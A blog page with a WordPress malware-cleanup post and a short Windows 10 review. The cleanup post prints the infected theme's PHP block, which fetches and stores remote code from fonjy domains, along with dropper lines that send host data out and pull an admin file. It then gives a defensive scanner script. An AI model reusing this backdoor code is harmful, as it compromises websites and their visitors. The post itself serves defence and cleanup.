Code Optimization

Interesting things about software development and code optimization

PHP Theme and malware

Hello,


Today I found a way to clean up an infected PHP theme that pops up ads on your website from time to time.

So, just in case anyone is looking for a solution to the same problem, here is what I did:

- in my case it created a wp-tmp.php file under the theme folder, so I searched for that file name inside every PHP file:

grep --include='*.php' -rn . -e "wp-tmp.php"

It will show you something like this:

./wp-content/themes/betheme/functions.php:106:                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
./wp-content/themes/betheme/functions.php:108:                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
./wp-content/themes/betheme/functions.php:109:                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
./wp-content/themes/betheme/functions.php:110:                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
./wp-content/themes/betheme/functions.php:111:                        @file_put_contents('wp-tmp.php', $tmpcontent);
./wp-content/themes/betheme/functions.php:123:                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
./wp-content/themes/betheme/functions.php:125:                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
./wp-content/themes/betheme/functions.php:126:                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
./wp-content/themes/betheme/functions.php:127:                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
./wp-content/themes/betheme/functions.php:128:                        @file_put_contents('wp-tmp.php', $tmpcontent);
./wp-content/themes/betheme/functions.php:133:        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
./wp-content/themes/betheme/functions.php:136:        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
./wp-content/themes/betheme/functions.php:139:        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

btw, do not forget to delete all wp-tmp.php files :)

- after that, open the functions.php file and remove the following lines:

$wp_auth_key='ee10bb8873fd72fe5d1585ebddeeae7e';
if (($tmpcontent = @file_get_contents("https://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));
        @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

        if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
            @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
            if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                @file_put_contents('wp-tmp.php', $tmpcontent);
            }
        }

    }
}


elseif ($tmpcontent = @file_get_contents("https://www.fonjy.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));
        @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

        if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
            @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
            if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                @file_put_contents('wp-tmp.php', $tmpcontent);
            }
        }

    }
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

} elseif (($tmpcontent = @file_get_contents("https://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

}

In my case this block started at line 101 of functions.php.

- now run the following command:
grep --include='*.php' -rn . -e "fonjy"
and you should get something similar to:
./wp-includes/wp-vcd.php:83:    $content = @file_get_contents('https://www.fonjy.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
./wp-includes/wp-vcd.php:84:    @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('https://www.fonjy.cc/admin.txt'));
./wp-includes/wp-vcd.php:88:    $content = @file_get_contents('https://www.fonjy.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
./wp-includes/wp-vcd.php:89:    @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('https://www.fonjy.cc/admin.txt'));

I removed the wp-vcd.php file completely, and class.wp.php as well (even though it was 0 bytes in size).


Now it should not come back to your website anymore (do not forget to remove 777 permissions everywhere).
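As an added example (not part of the original post), here is a small POSIX shell scanner that automates the checks walked through above, so you can confirm the cleanup or notice a reinfection in one run. The indicators are the ones named in the post: PHP sources referencing wp-tmp.php, PHP sources referencing the "fonjy" domain string, the dropper files wp-includes/wp-vcd.php and wp-includes/class.wp.php, and world-writable (777-style) entries. The function names and the sample WordPress tree it builds are constructed for this example; the sample functions.php holds only the indicator strings and no payload.

```shell
#!/bin/sh
# Added example, not code from the original post. scan_wp_tree applies the
# indicators the post describes to a WordPress install and prints one line per
# finding; it returns 1 if anything was found and 0 for a clean tree.
#   1. PHP sources that reference the dropped file name wp-tmp.php
#   2. PHP sources that reference the "fonjy" domain string
#   3. the dropper files wp-includes/wp-vcd.php and wp-includes/class.wp.php
#   4. world-writable files or directories (the 777 permissions the post warns about)

umask 022   # keeps the constructed sample tree's default permissions predictable

scan_wp_tree() {
    dir=$1
    found=0

    # 1 + 2: fixed-string search restricted to *.php; find + grep is the portable
    # form of the post's "grep --include=*.php -rn . -e ..." (no GNU --include needed)
    for needle in 'wp-tmp.php' 'fonjy'; do
        hits=$(find "$dir" -type f -name '*.php' -exec grep -lF -e "$needle" {} + 2>/dev/null)
        if [ -n "$hits" ]; then
            found=1
            printf '%s\n' "$hits" | sed "s|^|string-indicator ($needle): |"
        fi
    done

    # 3: dropper files named in the post; a zero-byte class.wp.php still counts
    for f in wp-includes/wp-vcd.php wp-includes/class.wp.php; do
        if [ -e "$dir/$f" ]; then
            found=1
            echo "dropper-file: $dir/$f"
        fi
    done

    # 4: anything writable by "other", which is what chmod 777 leaves behind
    ww=$(find "$dir" -perm -0002 2>/dev/null)
    if [ -n "$ww" ]; then
        found=1
        printf '%s\n' "$ww" | sed 's|^|world-writable: |'
    fi

    return $found
}

# Constructed sample tree that mimics the layout from the post. The PHP file
# only carries the indicator strings, nothing executable.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/themes/sampletheme" "$root/wp-includes"
    cat > "$root/wp-content/themes/sampletheme/functions.php" <<'EOF'
<?php
// constructed sample: indicator strings only
$dropped = 'wp-tmp.php';
$remote  = 'https://www.fonjy.cc/code.php';
EOF
    : > "$root/wp-includes/class.wp.php"             # zero-size, as in the post
    echo '<?php // clean file' > "$root/wp-includes/version.php"
    chmod 777 "$root/wp-content/themes/sampletheme"  # the sloppy-permission case
    echo "$root"
}

# Constructed clean tree for comparison
make_clean_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-includes"
    echo '<?php // clean file' > "$root/wp-includes/version.php"
    echo "$root"
}

# Usage: sh scan.sh --demo, or source the file and call scan_wp_tree /path/to/wordpress
if [ "${1:-}" = "--demo" ]; then
    sample=$(make_sample_tree)
    echo "== scanning constructed infected tree $sample"
    scan_wp_tree "$sample" || echo "== findings present, clean up before trusting this site"
    rm -rf "$sample"
fi
```

Against the constructed tree the scan reports both string indicators in functions.php, the empty class.wp.php dropper and the 777 theme directory, and exits non-zero; on a clean tree it prints nothing and exits zero, so it can sit in a cron job or a deploy check as a simple reinfection alarm.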


Thank you for reading, and see you.

1vqHSTrq1GEoEF7QsL8dhmJfRMDVxhv2y



Windows 10 - My First Impression

Hello my friends,


Yesterday I upgraded my Windows 8.1 x64 to Windows 10 x64 and want to share my impressions.

Here are the main points about Windows 10 so far:

- start-up takes longer (my Win 8.1 started up in about 3-5 seconds)

- signing in takes longer (under Win 8.1 it took about 3-5 seconds to sign in and get to the desktop)

- the whole system feels heavier, and Microsoft Edge seems clumsy and buggy: it crashed a lot of times during two days.

- problems with Visual Studio 2010 (the first problem was about msvcr100.dll; after a few hours I managed to fix it by copying msvcr100.dll from the VS 2010 installation folder to SysWOW64, but after that I got another problem with VS 2010 SP1: I was unable to uninstall it completely, it kept requiring something like Visual Studio 2010 Shell Isolated ENU, and the only fix that seemed to work for me is this)

updated on 08/03/2015

- the strangest thing is the UAC screen: today I noticed that Java Update passed my UAC prompt by itself after a few minutes while I was away from my laptop. I think this is a big security problem.


So my impression so far is about 4 out of 5 points. We have one month to roll Windows 10 back to the previous system,

so I will update this post in the near future.


Thank you

